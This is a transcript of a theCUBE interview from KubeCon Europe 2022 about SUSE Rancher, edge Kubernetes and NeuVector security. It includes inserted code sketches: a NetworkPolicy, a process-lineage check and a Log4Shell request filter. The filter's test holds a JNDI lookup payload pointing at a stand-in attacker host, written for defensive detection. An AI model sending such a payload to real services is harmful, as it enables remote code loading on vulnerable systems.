theCUBE presents KubeCon and CloudNativeCon Europe 2022, brought to you by Red Hat, the Cloud Native Computing Foundation, and its ecosystem partners.

Welcome to Valencia, Spain, and KubeCon, CloudNativeCon Europe 2022. I'm your host, Keith Townsend, alongside a new host, Enrico Signoretti, senior editor, I'm sorry, senior IT analyst at GigaOm. Enrico, welcome to the program.

Thank you very much, and thank you for having me. It's exciting.

So, high-level thoughts on KubeCon, first time in person again in a couple of years?

Well, this is amazing for several reasons. One of the reasons is that I had the chance to meet with people like you again. I mean, we met several times over the internet, over Zoom calls. I started to hate these Zoom calls because they are really impersonal in the end. And last night we were together, a group of friends, industry folks. It's just amazing. And apart from that, the event is really cool. There is a lot to learn from people, interviews, real people doing real stuff, not just impersonal calls where you don't even know if they are telling the truth. When you can look in their eyes at what they are doing, I think that makes a difference.

So speaking about real people, meeting people for the first time, new jobs, new roles: Greg Muscarella, General Manager of Enterprise Container Management at SUSE. Welcome to the show. Welcome back, CUBE alum.

Thank you very much. It's awesome to be here, and it's awesome to be back in person. And I completely agree with you. There's a certain fidelity to the conversation and a certain ability to get to know people a lot more. So it's absolutely fantastic to be here.

So Greg, tell us about your new role and what SUSE has going on at KubeCon.

Sure. So I joined SUSE about three months ago to lead the Rancher business unit, right? So our container management pieces. And it's a fantastic time.
Because if you look at the transition from virtual machines to containers, and to moving to microservices, right alongside that transition from on-prem to cloud, this is a very exciting time to be in this industry. And Rancher's been setting the stage. And again, coming back to being here, Rancher's all about the community, right? This is a very open, independent, community-driven product and project. So this is kind of like being back with our people, right? Being able to reconnect here. Doing it digital is great, but being here changes the game for us. We feed off that community, we feed off the energy. And again, going back to the space and what's happening in it, it's a great time to be in this space. And you guys have seen the transitions. We've seen just massive adoption of containers and Kubernetes overall, and Rancher's been right there with some amazing companies doing really interesting things that I'd never thought of before. So I'm still learning on this, but it's been great so far.

Yeah, and you know, when we talk about strategy around Kubernetes today, we are talking about very broad strategies. Not just the data center or the cloud, with maybe a smaller organization adopting Kubernetes in the cloud, but actually large organizations thinking hybrid, and more and more the edge. So what's your opinion on this expansion of Kubernetes towards the edge?

So I think you're exactly right, and that's actually a lot of the meetings I've been having here right now. There are some really interesting use cases. Whether it be ones that are easy to understand in the telco space, right? Especially with the adoption of 5G, you have all these base stations, new towers, and they have not only the core radio functions or network functions they're trying to do there, but other applications they want to run in that same environment.
I spoke recently with some of our good friends at a major automotive manufacturer doing things in their factories, right? Things that can't take the latency of being somewhere else. They have robots on the factory floor, and the latency they would experience if they tried to run things in the cloud meant that robot would have moved 10 centimeters by the time the signal got back. It may not seem like a lot to you, but if you're an employee there, a big 2,000-pound robot being 10 centimeters closer to you may not be what you really want. There's also a tremendous amount of activity happening on the retail side. It's amazing how people are deploying containers in retail outlets, whether it be fast food and predicting how many french fries you need to have going at this time of day with this sort of weather, right? So you can make sure those queues are actually moving. It's really exciting and interesting to look at all the different applications that are happening. So yes, on the edge for sure, and the public cloud for sure, and the data center. And what we're finding is people want a common platform across those as well, right? For the management piece, but also for security and for policies around these things. So it really is going everywhere.

So talk to me: how are we managing that? As we think about pushing stuff out of the data center, out of the cloud, closer to the edge, security and lifecycle management become top-of-mind challenges. How are Rancher and SUSE addressing that?

Yeah, so I think you're again spot on. It starts off with, think of it as simple, but it's not simple: the provisioning piece. How do we just get it installed and running, right? Then, to what you just asked, the management piece of it.
Everything from your firmware to your operating system to the Kubernetes cluster that's running on that, and then the workloads on top of that. So with Rancher, and with the rest of SUSE, we're actually tackling all those parts of the problem, from bare metal on up. We have lots of ways of deploying that operating system. We have operating systems that are optimized for the edge, very secure and ephemeral container images that you can build on top of. And then we have Rancher itself, which is not only managing your Kubernetes cluster but can actually start to manage the operating system components as well as the workload components, all from your single interface. We mentioned policy and security, and we'll probably talk about it more in a little bit, but NeuVector, right? We acquired a company called NeuVector and just open sourced it this past January. That ability to run that level of security software everywhere, again, is really important, right? Whether I'm running it on my favorite public cloud provider's managed Kubernetes or out at the edge, you still have to have security in there, and you want some consistency across that. If you had to have a different platform for each of your environments, that's just upping the complexity and the opportunity for error. So we really like to eliminate that and simplify our operators' and developers' lives as much as possible.

From this point of view, are you implying that you're matching, let's say, self-managed clusters at the very edge with added security? Because these are the two big problems lately. On one hand, having something that is somehow autonomous, easier to manage, especially if you are deploying hundreds of these micro clusters. And on the other hand, you need policy-based security that is strong enough to keep you safe.
Again, if you have these huge robots moving too close to you because somebody hacked the cluster that is managing them, that could be a huge problem. So are you approaching these kinds of problems? I mean, is the technology that you acquired ready to do this?

Yeah, I mean, it really is. There's still a lot of innovation happening, don't get me wrong. We're going to see a lot more, not just from SUSE and Rancher but from the community, right? There's a lot happening there. But we've come a long way and we've solved a lot of problems. If I think about how you have this distributed environment, well, it comes down to not just all the different environments, but also the applications. With microservices, you have a very dynamic environment now, just within your application space as well. So when we think about security, we really have to evolve from a fairly static policy, where you might even be able to set an IP address and a port and some configuration on that. Well, your workload's now dynamically moving. So not only do you have to have that security capability, like the ability to look at a process or look at a network connection and stop it, you have to have that manageability, right? You can't expect an operator or someone to go in and manually configure a YAML file, because things are changing too fast. It needs to be that combination of convenient and easy to manage, with full function and the ability to protect your resources. And I think that's really one of the key things NeuVector brings: because we have so much intelligence about what's going on there, the configuration is pretty high level and then it just runs, right? It's used to this dynamic environment. It can actually protect your workloads wherever they're going, from pod to pod.
And it's that combination, again, of manageability with high functionality that is what's making it so popular and what brings that security to those edge locations or cloud locations or your data center.

So one of the challenges you're touching on is this abstraction upon abstraction. When I ran my data center, I could say this IP address can't talk to this IP address on this port. Then I got next-generation firewalls, where I could actually do some analysis. Where are you seeing the ball moving when it comes to customers thinking about all these layers of abstraction? An IP address doesn't mean anything anymore in cloud native. Yes, I need one, but I'm not protecting based on IP address. How are customers approaching security from the namespace perspective?

Well, you're absolutely right. In fact, when you go to IPv6, I don't even recognize IP addresses anymore. They don't mean anything; just a bunch of alphanumerics and colons, right? So it comes back to that move away from the static. It's the pets versus cattle thing, right? From this static thing that I can sort of know and love and touch and protect, to this almost living, breathing thing which is moving all around, a swarm of pods moving all over the place. And that's what Kubernetes has done for the workload side of it: how do you get away from that pet to a declarative approach to identifying your workload, the components of that workload, and what it should be doing? And if we go further on the security side, it's actually not even namespace. Namespace isn't good enough. If we want to get to zero trust, just because you're running in my namespace doesn't mean I trust you, right? And that's one of the really cool things about NeuVector: we're looking at protocol-level stuff within the network.
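As an editor's aside, the "namespace isn't good enough" point can be illustrated with a plain Kubernetes NetworkPolicy, where trust is scoped to pod labels rather than to the whole namespace. This is standard Kubernetes, not NeuVector's own rule format, and all names and labels here are made up for illustration:

```yaml
# Even within the "shop" namespace, only pods labeled app=orders
# may reach the MySQL pods, and only on TCP port 3306.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: mysql-allow-orders-only
  namespace: shop
spec:
  podSelector:
    matchLabels:
      app: mysql
  policyTypes:
    - Ingress
  ingress:
    - from:
        - podSelector:
            matchLabels:
              app: orders
      ports:
        - protocol: TCP
          port: 3306
```

Note that a standard NetworkPolicy stops at layer 3/4 reachability; validating that the traffic is actually well-formed MySQL protocol, as discussed here, requires a layer-7-aware engine.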
So it's pod to pod. Every single connection we can look at, and it's at the protocol layer. So if you say you're a MySQL database and I have a MySQL request going into it, I can confirm that it's actually the MySQL protocol being spoken and that it's well formed, right? And I know that this endpoint, which is a container image or a pod name or a label, even if it's in the same namespace, is allowed to talk to this other pod running in my same namespace using this protocol. So I can either allow or deny, and I can look into the content of that request and make sure it's well formed. I'll give you an example. Do you remember the log4j challenges from not too long ago? It was a huge deal. If I'm doing something that's IP- and port-based and namespace-based, what are my protections, what are my options, for something that's got log4j embedded in it? I either run the risk of it running, or I shut it down. Those are my options, and neither one of those is very good. Because we're at the protocol layer, I can identify any log4j-style request and look at whether it's well formed or malicious. If it's malicious, I can block it. If it's well formed, I can let it go through. So I can actually handle those vulnerabilities; I don't have to take my service down. I can keep running and still be protected. And so that extra level, that ability to peek into things and also go pod to pod, not just namespace level, is one of the key differences. So that speaks to the evolution, how we're evolving with security. We've grown a lot, and we've got a lot more coming.

So let's talk about that "a lot more coming." What's in the pipeline for SUSE?

Well, probably before we get to that, we just announced NeuVector 5. So maybe I can catch us up on what was released last week, and then we can talk a little bit about going forward.
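Going back to the log4j point for a moment, the idea of blocking only the malicious request rather than the whole service can be sketched in a few lines. This is a toy payload filter, not NeuVector's implementation; the function name and regex are illustrative, matching the `${jndi:...}` lookup syntax that the Log4Shell exploit relied on:

```python
import re

# Hypothetical layer-7 filter: inspect each request body and drop only the
# ones carrying a JNDI lookup, instead of taking the whole service down.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def allow_request(body: str) -> bool:
    """Return True if the request may pass, False if it should be blocked."""
    return JNDI_LOOKUP.search(body) is None

# Well-formed traffic keeps flowing; exploit attempts are blocked.
assert allow_request("GET /search?q=kubecon") is True
assert allow_request("User-Agent: ${jndi:ldap://evil.example/a}") is False
```

A real engine would of course also parse the protocol itself, but the allow/deny decision per request is the point being made here.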
So NeuVector 5 introduced several things, but one of the things I can talk about in more detail is something called zero drift. I've been talking about network security, but we also do runtime security, right? Any container running within your environment has processes running in that container. What we can do actually comes back to that manageability and configuration: we can look at the root level of trust of any process that's running, and as long as it has that inheritance, we can let that process run without any extra configuration. If it doesn't have a root level of trust, like it didn't spawn from whatever the init function was in that container, we're not going to let it run. So the configuration you have to put in there is a lot simpler. That's something that's in NeuVector 5. The web application firewall, the layer-7 security inspection, has also gotten a lot more granular now. So it's that pod-to-pod security, for ingress, egress, and internal traffic on the cluster, right?

So before we get to what's in the pipeline, one question around NeuVector: how is it consumed and deployed?

Yeah, so with NeuVector 5 and also Rancher 2.6.5, which were just released, there's actually some nice integration between them. If I'm a Rancher customer and I'm using 2.6.5, I can deploy NeuVector with a couple of clicks of a button in our marketplace. And we're tied into our role-based access control, so an administrator who has the rights can just click, they're now in the NeuVector interface, and they can start setting those policies and deploying those things out very easily. Of course, if you aren't using Rancher and you're using some other container management platform, NeuVector still works great. You can deploy it there in a few clicks as well.
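Returning to the zero drift feature for a moment: the root-of-trust check described above can be sketched as a small ancestry walk. This is a toy model, with a dict of pid-to-parent-pid standing in for a live container's process tree, not NeuVector's actual implementation:

```python
# Zero-drift sketch: a process is allowed only if its ancestry chains back
# to the container's init process (PID 1 by convention).
def descends_from_init(pid: int, parent: dict[int, int], init_pid: int = 1) -> bool:
    """Walk the parent chain; allow only processes rooted at init."""
    seen = set()
    while pid not in seen:
        if pid == init_pid:
            return True
        seen.add(pid)
        if pid not in parent:
            return False  # orphan: no root of trust, so block it
        pid = parent[pid]
    return False  # cycle in the tree: malformed, block it

# PID 42 was spawned by init (1) via 10, so it may run; PID 99 was injected
# with no lineage back to init, so it is blocked.
tree = {10: 1, 42: 10, 99: 7, 7: 7}
assert descends_from_init(42, tree) is True
assert descends_from_init(99, tree) is False
```

The appeal of the approach, as described above, is that the operator writes almost no configuration: lineage itself is the policy.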
You're just going to have to log into your NeuVector interface and use it from there. So that's how it's deployed, and it's very simple to use. What's actually really exciting too is that we've open sourced it, so it's available for anyone to go download and try, and I would encourage people to give it a go. And I think there are some compelling reasons to do that now, right? Pod Security Policies are deprecated and going away pretty soon in Kubernetes, so there are a few things you might look at to make sure you're still able to run a secure environment within Kubernetes. So I think it's a great time to look at what's coming next for security within your Kubernetes.

So Greg, we really appreciate you stopping by.

Thank you.

From Valencia, Spain, I'm Keith Townsend, along with Enrico Signoretti. And you're watching theCUBE, the leader in high tech coverage.